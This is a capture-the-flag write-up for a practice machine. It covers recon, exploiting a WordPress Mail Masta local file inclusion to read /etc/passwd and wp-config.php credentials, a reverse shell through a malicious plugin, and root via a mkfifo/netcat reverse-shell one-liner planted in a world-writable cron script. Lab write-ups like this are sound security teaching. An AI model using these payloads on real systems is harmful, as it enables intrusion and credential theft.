All In One - Writeup

Jan 03, 2021

All In One Writeup

Recon :

bvr0n@kali:~/ctf/thm/All_in_One$ nmap -sC -sV 10.10.198.51
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-02 12:47 EST
Nmap scan report for 10.10.198.51
Host is up (0.15s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.8.14.157
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e2:5c:33:22:76:5c:93:66:cd:96:9c:16:6a:b3:17:a4 (RSA)
|   256 1b:6a:36:e1:8e:b4:96:5e:c6:ef:0d:91:37:58:59:b6 (ECDSA)
|_  256 fb:fa:db:ea:4e:ed:20:2b:91:18:9d:58:a0:6a:50:ec (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Web :

bvr0n@kali:~/ctf/thm/All_in_One$ ffuf -c -u http://10.10.198.51/FUZZ -w ~/Documents/Dirbuster/wordlist.txt 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.0.2


                        [Status: 200, Size: 10918, Words: 3499, Lines: 376]
.htpasswd               [Status: 403, Size: 277, Words: 20, Lines: 10]
.htaccess               [Status: 403, Size: 277, Words: 20, Lines: 10]
.hta                    [Status: 403, Size: 277, Words: 20, Lines: 10]
index.html              [Status: 200, Size: 10918, Words: 3499, Lines: 376]
server-status           [Status: 403, Size: 277, Words: 20, Lines: 10]
wordpress               [Status: 301, Size: 316, Words: 20, Lines: 10]

from here we get a user named elyana :

http://10.10.198.51/wordpress/index.php/author/elyana/

So after running wpscan i found something intresting :

bvr0n@kali:~/ctf/thm/All_in_One$ wpscan --url 10.10.198.51/wordpress
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.7
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Plugin(s) Identified:

[+] mail-masta
 | Location: http://10.10.198.51/wordpress/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.198.51/wordpress/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.10.198.51/wordpress/wp-content/plugins/mail-masta/readme.txt

I looked for this one and found this :

bvr0n@kali:~$ searchsploit mail masta
------------------------------------------------------------------------------------------------ ----------------------
 Exploit Title                                                                                  |  Path
------------------------------------------------------------------------------------------------ ----------------------
WordPress Plugin Mail Masta 1.0 - Local File Inclusion                                          | php/webapps/40290.txt
WordPress Plugin Mail Masta 1.0 - SQL Injection                                                 | php/webapps/41438.txt
------------------------------------------------------------------------------------------------ ----------------------

Apparently the LFI worked :

view-source:http://10.10.198.51/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

elyana:x:1000:1000:Elyana:/home/elyana:/bin/bash
mysql:x:110:113:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
ftp:x:111:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin

So since we have lfi let’s try to read the wordpress config file, after a little research online i found this Article explaining it :

bvr0n@kali:~/ctf/thm/All_in_One$ curl http://10.10.198.51/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=../../../../../wp-config.php | base64 -d

After login to the panel, i installed a malicious plugin that going to allow me to upload files and get a reverse shell. sh

bvr0n@kali:~/ctf/thm/All_in_One$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [#####] from (UNKNOWN) [10.10.198.51] 40994
Linux elyana 4.15.0-118-generic #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 18:53:43 up  1:08,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Privilege Escalation :

I enumerate manually and found a juicy root path :

bash-4.4$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*  *    * * *   root    /var/backups/script.sh

so basically what this cron does, root is executing what ever is in /var/backups/script.sh

bash-4.4$ ls -la /var/backups/script.sh
-rwxrwxrwx 1 root root 73 Oct  7 13:37 /var/backups/script.sh

We have the permissions the edit this file, so let’s get a reverse shell inside :

bash-4.4$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [IP] [PORT] >/tmp/f" > /var/backups/script.sh

And set a listner before :

bvr0n@kali:~$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [#####] from (UNKNOWN) [10.10.198.51] 40998
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# 

And we are root now, I hope you enjoyed my writeup.